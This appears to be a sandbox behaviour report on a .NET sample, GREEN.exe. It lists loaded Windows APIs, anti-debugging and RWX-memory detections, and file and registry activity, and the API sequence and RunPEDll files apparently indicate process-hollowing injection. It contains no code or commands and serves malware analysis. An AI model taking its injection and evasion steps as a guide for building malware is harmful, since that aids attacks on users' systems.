- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionAndSpinCount
- DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
- DynamicLoader: msvcrt.dll/_set_error_mode
- DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
- DynamicLoader: msvcrt.dll/_get_terminate
- DynamicLoader: KERNEL32.dll/FindActCtxSectionStringW
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: mscorwks.dll/SetLoadedByMscoree
- DynamicLoader: mscorwks.dll/_CorExeMain
- DynamicLoader: mscorwks.dll/GetCLRFunction
- DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
- DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
- DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
- DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
- DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
- DynamicLoader: ADVAPI32.dll/TraceEvent
- DynamicLoader: MSCOREE.DLL/IEE
- DynamicLoader: mscoreei.dll/IEE_RetAddr
- DynamicLoader: mscoreei.dll/IEE
- DynamicLoader: mscorwks.dll/IEE
- DynamicLoader: MSCOREE.DLL/GetStartupFlags
- DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
- DynamicLoader: mscoreei.dll/GetStartupFlags
- DynamicLoader: MSCOREE.DLL/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
- DynamicLoader: mscoreei.dll/GetHostConfigurationFile
- DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
- DynamicLoader: mscoreei.dll/GetCORVersion
- DynamicLoader: MSCOREE.DLL/GetCORSystemDirectory
- DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: ntdll.dll/RtlUnwind
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/AddVectoredContinueHandler
- DynamicLoader: KERNEL32.dll/RemoveVectoredContinueHandler
- DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/GetWriteWatch
- DynamicLoader: KERNEL32.dll/ResetWriteWatch
- DynamicLoader: KERNEL32.dll/CreateMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryMemoryResourceNotification
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetVersionEx
- DynamicLoader: KERNEL32.dll/GetVersionExW
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
- DynamicLoader: ADVAPI32.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/CryptCreateHash
- DynamicLoader: ADVAPI32.dll/CryptDestroyHash
- DynamicLoader: ADVAPI32.dll/CryptHashData
- DynamicLoader: ADVAPI32.dll/CryptGetHashParam
- DynamicLoader: ADVAPI32.dll/CryptImportKey
- DynamicLoader: ADVAPI32.dll/CryptExportKey
- DynamicLoader: ADVAPI32.dll/CryptGenKey
- DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
- DynamicLoader: ADVAPI32.dll/CryptDestroyKey
- DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
- DynamicLoader: ADVAPI32.dll/CryptSignHashA
- DynamicLoader: ADVAPI32.dll/CryptGetProvParam
- DynamicLoader: ADVAPI32.dll/CryptGetUserKey
- DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
- DynamicLoader: MSCOREE.DLL/GetMetaDataInternalInterface
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface_RetAddr
- DynamicLoader: mscoreei.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorwks.dll/GetMetaDataInternalInterface
- DynamicLoader: mscorjit.dll/getJit
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/GetUserDefaultUILanguage
- DynamicLoader: KERNEL32.dll/SetErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
- DynamicLoader: mscoreei.dll/LoadLibraryShim
- DynamicLoader: culture.dll/ConvertLangIdToCultureName
- DynamicLoader: KERNEL32.dll/lstrlen
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: MSCOREE.DLL/ND_RI4
- DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI4
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GlobalMemoryStatusEx
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariable
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariableW
- DynamicLoader: KERNEL32.dll/SwitchToThread
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/DebugActiveProcess
- DynamicLoader: KERNEL32.dll/WaitForDebugEvent
- DynamicLoader: KERNEL32.dll/ContinueDebugEvent
- DynamicLoader: KERNEL32.dll/DeleteFileA
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: ADVAPI32.dll/SetKernelObjectSecurity
- DynamicLoader: ADVAPI32.dll/GetKernelObjectSecurity
- DynamicLoader: ntdll.dll/NtSetInformationProcess
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/TerminateProcess
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: KERNEL32.dll/CreateProcessWW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ADVAPI32.dll/EventUnregister
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:32:31 | 2018-09-09 19:35:28 | 177 |
8 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\GREEN.exe.config C:\Users\Seven01\AppData\Local\Temp\GREEN.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\GREEN.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\GREEN.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol36.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\GREEN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\GREEN.resources\GREEN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\GREEN.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\GREEN.resources\GREEN.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\GREEN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\GREEN.resources\GREEN.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\GREEN.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\GREEN.resources\GREEN.resources.exe C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2504.15743750 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2504.15743750 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2504.15743859 C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\GREEN.exe.config C:\Users\Seven01\AppData\Local\Temp\GREEN.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol36.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\SysWOW64\ntdll.dll
Write Files
Nothing to display
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2504.15743750 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2504.15743750 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2504.15743859
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GREEN.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID 